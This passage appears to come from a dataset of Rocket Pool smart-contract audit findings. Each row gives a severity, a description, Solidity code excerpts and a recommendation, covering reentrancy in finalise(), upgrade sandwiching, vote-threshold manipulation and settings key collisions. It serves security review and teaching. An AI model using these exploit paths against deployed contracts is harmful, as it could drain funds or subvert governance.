payable(rocketTokenRETH).transfer(address(this).balance);\\n }\\n // Trigger a deposit of excess collateral from rETH contract to deposit pool\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral();\\n // Unlock node operator's RPL\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress);\\n // Update unbonded validator count if minipool is unbonded\\n if (depositType == MinipoolDeposit.Empty) {\\n RocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\n rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress);\\n }\\n // Set finalised flag\\n finalised = true;\\n}\\n```\\n\\n```\\nfunction \\_refund() private {\\n // Update refund balance\\n uint256 refundAmount = nodeRefundBalance;\\n nodeRefundBalance = 0;\\n // Get node withdrawal address\\n address nodeWithdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n // Transfer refund amount\\n (bool success,) = nodeWithdrawalAddress.call{value : refundAmount}("""");\\n require(success, ""ETH refund amount was not successfully transferred to node operator"");\\n // Emit ether withdrawn event\\n emit EtherWithdrawn(nodeWithdrawalAddress, refundAmount, block.timestamp);\\n}\\n```\\n\\nMethods adjusting system settings called twice:\\n```\\n// Increments \\_nodeAddress' number of minipools that have been finalised\\nfunction incrementNodeFinalisedMinipoolCount(address \\_nodeAddress) override external onlyLatestContract(""rocketMinipoolManager"", address(this)) onlyRegisteredMinipool(msg.sender) {\\n // Update the node specific count\\n addUint(keccak256(abi.encodePacked(""node.minipools.finalised.count"", \\_nodeAddress)), 1);\\n // Update the total count\\n addUint(keccak256(bytes(""minipools.finalised.count"")), 1);\\n}\\n```\\n\\n```\\n}\\nfunction decrementMemberUnbondedValidatorCount(address \\_nodeAddress) override external onlyLatestContract(""rocketDAONodeTrusted"", 
address(this)) onlyRegisteredMinipool(msg.sender) {\\n subUint(keccak256(abi.encodePacked(daoNameSpace, ""member.validator.unbonded.count"", \\_nodeAddress)), 1);\\n}\\n```\\n","We recommend setting the `finalised = true` flag immediately after checking for it. Additionally, the function flow should adhere to the checks-effects-interactions pattern whenever possible. We recommend adding generic reentrancy protection whenever the control flow is handed to an untrusted entity.",,"```\\nfinalise() --> \\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n _refund()\\n nodeRefundBalance = 0 //<-- reset refund balance\\n ---> extCall: nodeWithdrawalAddress\\n ---> reenter: finalise()\\n status == MinipoolStatus.Withdrawable //<-- true\\n withdrawalBlock > 0 //<-- true\\n _finalise() -->\\n !finalised //<-- true\\n nodeRefundBalance > 0 //<-- false; no refund()\\n address(this).balance to RETH\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral()\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress) //<-- 1st time\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); \\n finalised = true;\\n <--- return from reentrant call\\n <--- return from _refund()\\n address(this).balance to RETH //<-- NOP as balance was sent to RETH already\\n RocketTokenRETHInterface(rocketTokenRETH).depositExcessCollateral(); //<-- does not revert\\n rocketMinipoolManager.incrementNodeFinalisedMinipoolCount(nodeAddress); //<-- no revert, increases\\n 'node.minipools.finalised.count', 'minipools.finalised.count', reduces 'eth.matched.node.amount' one to\\n many times\\n eventually call rocketDAONodeTrusted.decrementMemberUnbondedValidatorCount(nodeAddress); //<-- manipulates\\n 'member.validator.unbonded.count' by +1\\n finalised = true; //<-- is already 'true', gracefully continues\\n<--- returns \\n```\\n" +RocketMinipoolDelegate - Sandwiching 
of Minipool calls can have unintended side effects,high,"The `RocketMinipoolBase` contract exposes the functions `delegateUpgrade` and `delegateRollback`, allowing the minipool owner to switch between delegate implementations. While giving the minipool owner a chance to roll back potentially malfunctioning upgrades, the fact that upgrades and rollback are instantaneous also gives them a chance to alternate between executing old and new code (e.g. by utilizing callbacks) and sandwich user calls to the minipool.\\nAssuming the latest minipool delegate implementation, any user can call `RocketMinipoolDelegate.slash`, which slashes the node operator's RPL balance if a slashing has been recorded on their validator. To mark the minipool as having been `slashed`, the `slashed` contract variable is set to `true`. A minipool owner can avoid this flag from being set By sandwiching the user calls:\\nIn detail, the new slash implementation:\\n```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n\\nCompared to the old slash implementation:\\n```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n}\\n```\\n\\nWhile the bypass of `slashed` being set is a benign example, the effects of this issue, in general, could result in a significant disruption of minipool operations and potentially affect the system's funds. 
The impact highly depends on the changes introduced by future minipool upgrades.","We recommend limiting upgrades and rollbacks to prevent minipool owners from switching implementations with an immediate effect. A time lock can fulfill this purpose when a minipool owner announces an upgrade to be done at a specific block. A warning can precede user-made calls that an upgrade is pending, and their interaction can have unintended side effects.",,"```\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n" +RocketDAONodeTrustedActions - No way to access ETH provided by non-member votes Acknowledged,high,"DAO members can challenge nodes to prove liveliness for free. Non-DAO members must provide `members.challenge.cost = 1 eth` to start a challenge. However, the provided challenge cost is locked within the contract instead of being returned or recycled as system collateral.\\n```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. 
Members that need removing when consensus is still viable, should be done via the 'kick' method.\\nfunction actionChallengeMake(address \\_nodeAddress) override external onlyTrustedNode(\\_nodeAddress) onlyRegisteredNode(msg.sender) onlyLatestContract(""rocketDAONodeTrustedActions"", address(this)) payable {\\n // Load contracts\\n RocketDAONodeTrustedInterface rocketDAONode = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\n RocketDAONodeTrustedSettingsMembersInterface rocketDAONodeTrustedSettingsMembers = RocketDAONodeTrustedSettingsMembersInterface(getContractAddress(""rocketDAONodeTrustedSettingsMembers""));\\n // Members can challenge other members for free, but for a regular bonded node to challenge a DAO member, requires non-refundable payment to prevent spamming\\n if(rocketDAONode.getMemberIsValid(msg.sender) != true) require(msg.value == rocketDAONodeTrustedSettingsMembers.getChallengeCost(), ""Non DAO members must pay ETH to challenge a members node"");\\n // Can't challenge yourself duh\\n require(msg.sender != \\_nodeAddress, ""You cannot challenge yourself"");\\n // Is this member already being challenged?\\n```\\n","We recommend locking the ETH inside the contract during the challenge process. If a challenge is refuted, we recommend feeding the locked value back into the system as protocol collateral. If the challenge succeeds and the node is kicked, it is assumed that the challenger will be repaid the amount they had to lock up to prove non-liveliness.",,"```\\n// In the event that the majority/all of members go offline permanently and no more proposals could be passed, a current member or a regular node can 'challenge' a DAO members node to respond\\n// If it does not respond in the given window, it can be removed as a member. 
The one who removes the member after the challenge isn't met, must be another node other than the proposer to provide some oversight\\n// This should only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\nfunction actionChallengeMake(address \\_nodeAddress) override external onlyTrustedNode(\\_nodeAddress) onlyRegisteredNode(msg.sender) onlyLatestContract(""rocketDAONodeTrustedActions"", address(this)) payable {\\n // Load contracts\\n RocketDAONodeTrustedInterface rocketDAONode = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\n RocketDAONodeTrustedSettingsMembersInterface rocketDAONodeTrustedSettingsMembers = RocketDAONodeTrustedSettingsMembersInterface(getContractAddress(""rocketDAONodeTrustedSettingsMembers""));\\n // Members can challenge other members for free, but for a regular bonded node to challenge a DAO member, requires non-refundable payment to prevent spamming\\n if(rocketDAONode.getMemberIsValid(msg.sender) != true) require(msg.value == rocketDAONodeTrustedSettingsMembers.getChallengeCost(), ""Non DAO members must pay ETH to challenge a members node"");\\n // Can't challenge yourself duh\\n require(msg.sender != \\_nodeAddress, ""You cannot challenge yourself"");\\n // Is this member already being challenged?\\n```\\n" +Multiple checks-effects violations,high,"Throughout the system, there are various violations of the checks-effects-interactions pattern where the contract state is updated after an external call. 
Since large parts of the Rocket Pool system's smart contracts are not guarded against reentrancy, the external call's recipient may reenter and potentially perform malicious actions that can impact the overall accounting and, thus, system funds.\\n`distributeToOwner()` sends the contract's balance to the node or the withdrawal address before clearing the internal accounting:\\n```\\n/// @notice Withdraw node balances from the minipool and close it. Only accepts calls from the owner\\nfunction close() override external onlyMinipoolOwner(msg.sender) onlyInitialised {\\n // Check current status\\n require(status == MinipoolStatus.Dissolved, ""The minipool can only be closed while dissolved"");\\n // Distribute funds to owner\\n distributeToOwner();\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n require(rocketMinipoolManager.getMinipoolExists(address(this)), ""Minipool already closed"");\\n rocketMinipoolManager.destroyMinipool();\\n // Clear state\\n nodeDepositBalance = 0;\\n nodeRefundBalance = 0;\\n userDepositBalance = 0;\\n userDepositBalanceLegacy = 0;\\n userDepositAssignedTime = 0;\\n}\\n```\\n\\nThe withdrawal block should be set before any other contracts are called:\\n```\\n// Save block to prevent multiple withdrawals within a few blocks\\nwithdrawalBlock = block.number;\\n```\\n\\nThe `slashed` state should be set before any external calls are made:\\n```\\n/// @dev Slash node operator's RPL balance based on nodeSlashBalance\\nfunction \\_slash() private {\\n // Get contracts\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(""rocketNodeStaking""));\\n // Slash required amount and reset storage value\\n uint256 slashAmount = nodeSlashBalance;\\n nodeSlashBalance = 0;\\n rocketNodeStaking.slashRPL(nodeAddress, slashAmount);\\n // Record slashing\\n slashed = true;\\n}\\n```\\n\\nIn the bond 
reducer, the accounting values should be cleared before any external calls are made:\\n```\\n// Get desired to amount\\nuint256 newBondAmount = getUint(keccak256(abi.encodePacked(""minipool.bond.reduction.value"", msg.sender)));\\nrequire(rocketNodeDeposit.isValidDepositAmount(newBondAmount), ""Invalid bond amount"");\\n// Calculate difference\\nuint256 existingBondAmount = minipool.getNodeDepositBalance();\\nuint256 delta = existingBondAmount.sub(newBondAmount);\\n// Get node address\\naddress nodeAddress = minipool.getNodeAddress();\\n// Increase ETH matched or revert if exceeds limit based on current RPL stake\\nrocketNodeDeposit.increaseEthMatched(nodeAddress, delta);\\n// Increase node operator's deposit credit\\nrocketNodeDeposit.increaseDepositCreditBalance(nodeAddress, delta);\\n// Clean up state\\ndeleteUint(keccak256(abi.encodePacked(""minipool.bond.reduction.time"", msg.sender)));\\ndeleteUint(keccak256(abi.encodePacked(""minipool.bond.reduction.value"", msg.sender)));\\n```\\n\\nThe counter for reward snapshot execution should be incremented before RPL gets minted:\\n```\\n// Execute inflation if required\\nrplContract.inflationMintTokens();\\n// Increment the reward index and update the claim interval timestamp\\nincrementRewardIndex();\\n```\\n","We recommend following the checks-effects-interactions pattern and adjusting any contract state variables before making external calls. With the upgradeable nature of the system, we also recommend strictly adhering to this practice when all external calls are being made to trusted network contracts.",,"```\\n/// @notice Withdraw node balances from the minipool and close it. 
Only accepts calls from the owner\\nfunction close() override external onlyMinipoolOwner(msg.sender) onlyInitialised {\\n // Check current status\\n require(status == MinipoolStatus.Dissolved, ""The minipool can only be closed while dissolved"");\\n // Distribute funds to owner\\n distributeToOwner();\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n require(rocketMinipoolManager.getMinipoolExists(address(this)), ""Minipool already closed"");\\n rocketMinipoolManager.destroyMinipool();\\n // Clear state\\n nodeDepositBalance = 0;\\n nodeRefundBalance = 0;\\n userDepositBalance = 0;\\n userDepositBalanceLegacy = 0;\\n userDepositAssignedTime = 0;\\n}\\n```\\n" +RocketMinipoolDelegate - Redundant refund() call on forced finalization,medium,"The `RocketMinipoolDelegate.refund` function will force finalization if a user previously distributed the pool. However, `_finalise` already calls `_refund()` if there is a node refund balance to transfer, making the additional call to `_refund()` in `refund()` obsolete.\\n```\\nfunction refund() override external onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) onlyInitialised {\\n // Check refund balance\\n require(nodeRefundBalance > 0, ""No amount of the node deposit is available for refund"");\\n // If this minipool was distributed by a user, force finalisation on the node operator\\n if (!finalised && userDistributed) {\\n \\_finalise();\\n }\\n // Refund node\\n \\_refund();\\n}\\n```\\n\\n```\\nfunction \\_finalise() private {\\n // Get contracts\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n // Can only finalise the pool once\\n require(!finalised, ""Minipool has already been finalised"");\\n // Set finalised flag\\n finalised = true;\\n // If slash is required then perform it\\n if (nodeSlashBalance > 0) {\\n 
\\_slash();\\n }\\n // Refund node operator if required\\n if (nodeRefundBalance > 0) {\\n \\_refund();\\n }\\n```\\n",Resolution\\nFixed in https://github.com/rocket-pool/rocketpool/tree/77d7cca65b7c0557cfda078a4fc45f9ac0cc6cc6 by refactoring `refund()` to avoid a double invocation of `_refund()` in the `_finalise()` codepath.\\nFixed per the recommendation. Thanks.\\nWe recommend refactoring the if condition to contain `_refund()` in the else branch.,,"```\\nfunction refund() override external onlyMinipoolOwnerOrWithdrawalAddress(msg.sender) onlyInitialised {\\n // Check refund balance\\n require(nodeRefundBalance > 0, ""No amount of the node deposit is available for refund"");\\n // If this minipool was distributed by a user, force finalisation on the node operator\\n if (!finalised && userDistributed) {\\n \\_finalise();\\n }\\n // Refund node\\n \\_refund();\\n}\\n```\\n" +Sparse documentation and accounting complexity Acknowledged,medium,"Throughout the project, inline documentation is either sparse or missing altogether. Furthermore, few technical documents about the system's design rationale are available. The recent releases' increased complexity makes it significantly harder to trace the flow of funds through the system as components change semantics, are split into separate contracts, etc.\\nIt is essential that documentation not only outlines what is being done but also why and what a function's role in the system's “bigger picture” is. Many comments in the code base fail to fulfill this requirement and are thus redundant, e.g.\\n```\\n// Sanity check that refund balance is zero\\nrequire(nodeRefundBalance == 0, ""Refund balance not zero"");\\n```\\n\\n```\\n// Remove from vacant set\\nrocketMinipoolManager.removeVacantMinipool();\\n```\\n\\n```\\nif (ownerCalling) {\\n // Finalise the minipool if the owner is calling\\n \\_finalise();\\n```\\n\\nThe increased complexity and lack of documentation can increase the likelihood of developer error. 
Furthermore, the time spent maintaining the code and introducing new developers to the code base will drastically increase. This effect can be especially problematic in the system's accounting of funds as the various stages of a Minipool imply different flows of funds and interactions with external dependencies. Documentation should explain the rationale behind specific hardcoded values, such as the magic `8 ether` boundary for withdrawal detection. An example of a lack of documentation and distribution across components is the calculation and influence of `ethMatched` as it plays a role in:\\nthe minipool bond reducer,\\nthe node deposit contract,\\nthe node manager, and\\nthe node staking contract.","As the Rocketpool system grows in complexity, we highly recommend significantly increasing the number of inline comments and general technical documentation and exploring ways to centralize the system's accounting further to provide a clear picture of which funds move where and at what point in time. Where the flow of funds is obscured because multiple components or multi-step processes are involved, we recommend adding extensive inline documentation to give context.",,"```\\n// Sanity check that refund balance is zero\\nrequire(nodeRefundBalance == 0, ""Refund balance not zero"");\\n```\\n" +RocketNodeDistributor - Missing extcodesize check in dynamic proxy Won't Fix,medium,"`RocketNodeDistributor` dynamically retrieves the currently set delegate from the centralized `RocketStorage` contract. The target contract (delegate) is resolved inside the fallback function. It may return `address(0)`. `rocketStorage.getAddress()` does not enforce that the requested settings key exists, which may lead to `RocketNodeDistributor` delegate-calling into `address(0)`, which returns no error. 
This might stay undetected when calling `RocketNodeDistributorDelegate.distribute()` as the method does not return a value, which is consistent with calling a target address with no code.\\n```\\nfallback() external payable {\\n address \\_target = rocketStorage.getAddress(distributorStorageKey);\\n assembly {\\n calldatacopy(0x0, 0x0, calldatasize())\\n let result := delegatecall(gas(), \\_target, 0x0, calldatasize(), 0x0, 0)\\n returndatacopy(0x0, 0x0, returndatasize())\\n switch result case 0 {revert(0, returndatasize())} default {return (0, returndatasize())}\\n }\\n}\\n```\\n\\n```\\nfunction getAddress(bytes32 \\_key) override external view returns (address r) {\\n return addressStorage[\\_key];\\n}\\n```\\n","Before delegate-calling into the target contract, check if it exists.\\n```\\nassembly {\\n codeSize := extcodesize(\\_target)\\n}\\nrequire(codeSize > 0);\\n```\\n",,"```\\nfallback() external payable {\\n address \\_target = rocketStorage.getAddress(distributorStorageKey);\\n assembly {\\n calldatacopy(0x0, 0x0, calldatasize())\\n let result := delegatecall(gas(), \\_target, 0x0, calldatasize(), 0x0, 0)\\n returndatacopy(0x0, 0x0, returndatasize())\\n switch result case 0 {revert(0, returndatasize())} default {return (0, returndatasize())}\\n }\\n}\\n```\\n" +Kicked oDAO members' votes taken into account Acknowledged,medium,"oDAO members can vote on proposals or submit external data to the system, acting as an oracle. Data submission is based on a vote by itself, and multiple oDAO members must submit the same data until a configurable threshold (51% by default) is reached for the data to be confirmed.\\nWhen a member gets kicked or leaves the oDAO after voting, their vote is still accounted for while the total number of oDAO members decreases.\\nA (group of) malicious oDAO actors may exploit this fact to artificially lower the consensus threshold by voting for a proposal and then leaving the oDAO. 
This will leave excess votes with the proposal while the total member count decreases.\\nFor example, let's assume there are 17 oDAO members. 9 members must vote for the proposal for it to pass (52.9%). Let's assume 8 members voted for, and the rest abstained and is against the proposal (47%, threshold not met). The proposal is unlikely to pass unless two malicious oDAO members leave the DAO, lowering the member count to 15 in an attempt to manipulate the vote, suddenly inflating vote power from 8/17 (47%; rejected) to 8/15 (53.3%; passed).\\nThe crux is that the votes of ex-oDAO members still count, while the quorum is based on the current oDAO member number.\\nHere are some examples, however, this is a general pattern used for oDAO votes in the system.\\nExample: RocketNetworkPrices\\nMembers submit votes via `submitPrices()`. If the threshold is reached, the proposal is executed. Quorum is based on the current oDAO member count, votes of ex-oDAO members are still accounted for. If a proposal is a near miss, malicious actors can force execute it by leaving the oDAO, lowering the threshold, and then calling `executeUpdatePrices()` to execute it.\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n\\n```\\nfunction executeUpdatePrices(uint256 \\_block, uint256 \\_rplPrice) override external onlyLatestContract(""rocketNetworkPrices"", address(this)) {\\n // Check settings\\n```\\n\\nRocketMinipoolBondReducer\\nThe `RocketMinipoolBondReducer` contract's `voteCancelReduction` function takes old votes of previously kicked oDAO members into account. 
This results in the vote being significantly higher and increases the potential for malicious actors, even after their removal, to sway the vote. Note that a canceled bond reduction cannot be undone.\\n```\\nRocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(""rocketDAONodeTrustedSettingsMinipool""));\\nuint256 quorum = rocketDAONode.getMemberCount().mul(rocketDAONodeTrustedSettingsMinipool.getCancelBondReductionQuorum()).div(calcBase);\\nbytes32 totalCancelVotesKey = keccak256(abi.encodePacked(""minipool.bond.reduction.vote.count"", \\_minipoolAddress));\\nuint256 totalCancelVotes = getUint(totalCancelVotesKey).add(1);\\nif (totalCancelVotes > quorum) {\\n```\\n\\nRocketNetworkPenalties\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodePenaltyThreshold()) {\\n setBool(executedKey, true);\\n incrementMinipoolPenaltyCount(\\_minipoolAddress);\\n}\\n```\\n\\n```\\n// Executes incrementMinipoolPenaltyCount if consensus threshold is reached\\nfunction executeUpdatePenalty(address \\_minipoolAddress, uint256 \\_block) override external onlyLatestContract(""rocketNetworkPenalties"", address(this)) {\\n // Get contracts\\n RocketDAOProtocolSettingsNetworkInterface rocketDAOProtocolSettingsNetwork = RocketDAOProtocolSettingsNetworkInterface(getContractAddress(""rocketDAOProtocolSettingsNetwork""));\\n // Get submission keys\\n```\\n",Track oDAO members' votes and remove them from the tally when the removal from the oDAO is executed.,,"```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= 
rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n" +RocketDAOProtocolSettingsRewards - settings key collission Acknowledged,medium,"A malicious user may craft a DAO protocol proposal to set a rewards claimer for a specific contract, thus overwriting another contract's settings. This issue arises due to lax requirements when choosing safe settings keys.\\n```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, ""Claimers cannot total more than 100%"");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,""rewards.claims"", ""group.totalPerc"")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount"", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount.updated.time"", \\_contractName)), block.timestamp);\\n}\\n```\\n\\nThe method updates the rewards claimer for a specific contract by writing to the following two setting keys:\\n`settingNameSpace.rewards.claimsgroup.amount<_contractName>`\\n`settingNameSpace.rewards.claimsgroup.amount.updated.time<_contractName>`\\nDue to the way the settings hierarchy was chosen in this case, a malicious proposal might define a `<_contractName> = .updated.time` that overwrites the settings of a different contract with an invalid value.\\nNote that the issue of delimiter consistency is also discussed in 
issue 5.12.\\nThe severity rating is based on the fact that this should be detectable by DAO members. However, following a defense-in-depth approach means that such collisions should be avoided wherever possible.","We recommend enforcing a unique prefix and delimiter when concatenating user-provided input to setting keys. In this specific case, the settings could be renamed as follows:\\n`settingNameSpace.rewards.claimsgroup.amount.value<_contractName>`\\n`settingNameSpace.rewards.claimsgroup.amount.updated.time<_contractName>`",,"```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, ""Claimers cannot total more than 100%"");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,""rewards.claims"", ""group.totalPerc"")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount"", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount.updated.time"", \\_contractName)), block.timestamp);\\n}\\n```\\n" +RocketDAOProtocolSettingsRewards - missing setting delimiters Acknowledged,medium,"Settings in the Rocket Pool system are hierarchical, and namespaces are prefixed using dot delimiters.\\nCalling `abi.encodePacked(, )` on strings performs a simple concatenation. According to the settings' naming scheme, it is suggested that the following example writes to a key named: `.rewards.claims.group.amount.<_contractName>`. 
However, due to missing delimiters, the actual key written to is: `.rewards.claimsgroup.amount<_contractName>`.\\nNote that there is no delimiter between `claims|group` and `amount|<_contractName>`.\\n```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, ""Claimers cannot total more than 100%"");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,""rewards.claims"", ""group.totalPerc"")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount"", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount.updated.time"", \\_contractName)), block.timestamp);\\n}\\n```\\n",We recommend adding the missing intermediate delimiters. 
The system should enforce delimiters after the last setting key before user input is concatenated to reduce the risk of accidental namespace collisions.,,"```\\nfunction setSettingRewardsClaimer(string memory \\_contractName, uint256 \\_perc) override public onlyDAOProtocolProposal {\\n // Get the total perc set, can't be more than 100\\n uint256 percTotal = getRewardsClaimersPercTotal();\\n // If this group already exists, it will update the perc\\n uint256 percTotalUpdate = percTotal.add(\\_perc).sub(getRewardsClaimerPerc(\\_contractName));\\n // Can't be more than a total claim amount of 100%\\n require(percTotalUpdate <= 1 ether, ""Claimers cannot total more than 100%"");\\n // Update the total\\n setUint(keccak256(abi.encodePacked(settingNameSpace,""rewards.claims"", ""group.totalPerc"")), percTotalUpdate);\\n // Update/Add the claimer amount\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount"", \\_contractName)), \\_perc);\\n // Set the time it was updated at\\n setUint(keccak256(abi.encodePacked(settingNameSpace, ""rewards.claims"", ""group.amount.updated.time"", \\_contractName)), block.timestamp);\\n}\\n```\\n" +Use of address instead of specific contract types Acknowledged,low,"Rather than using a low-level `address` type and then casting to the safer contract type, it's better to use the best type available by default so the compiler can eventually check for type safety and contract existence and only downcast to less secure low-level types (address) when necessary.\\n`RocketStorageInterface _rocketStorage` should be declared in the arguments, removing the need to cast the address explicitly.\\n```\\n/// @notice Sets up starting delegate contract and then delegates initialisation to it\\nfunction initialise(address \\_rocketStorage, address \\_nodeAddress) external override notSelf {\\n // Check input\\n require(\\_nodeAddress != address(0), ""Invalid node address"");\\n require(storageState == 
StorageState.Undefined, ""Already initialised"");\\n // Set storage state to uninitialised\\n storageState = StorageState.Uninitialised;\\n // Set rocketStorage\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n```\\n\\n`RocketMinipoolInterface _minipoolAddress` should be declared in the arguments, removing the need to cast the address explicitly. Downcast to low-level address if needed. The event can be redeclared with the contract type.\\n```\\nfunction beginReduceBondAmount(address \\_minipoolAddress, uint256 \\_newBondAmount) override external onlyLatestContract(""rocketMinipoolBondReducer"", address(this)) {\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n```\\n\\n```\\n/// @notice Returns whether owner of given minipool can reduce bond amount given the waiting period constraint\\n/// @param \\_minipoolAddress Address of the minipool\\nfunction canReduceBondAmount(address \\_minipoolAddress) override public view returns (bool) {\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n RocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(""rocketDAONodeTrustedSettingsMinipool""));\\n uint256 reduceBondTime = getUint(keccak256(abi.encodePacked(""minipool.bond.reduction.time"", \\_minipoolAddress)));\\n return rocketDAONodeTrustedSettingsMinipool.isWithinBondReductionWindow(block.timestamp.sub(reduceBondTime));\\n}\\n```\\n\\n```\\nfunction voteCancelReduction(address \\_minipoolAddress) override external onlyTrustedNode(msg.sender) onlyLatestContract(""rocketMinipoolBondReducer"", address(this)) {\\n // Prevent calling if consensus has already been reached\\n require(!getReduceBondCancelled(\\_minipoolAddress), ""Already cancelled"");\\n // Get contracts\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipoolAddress);\\n```\\n\\nNote that `abi.encode*(contractType)` 
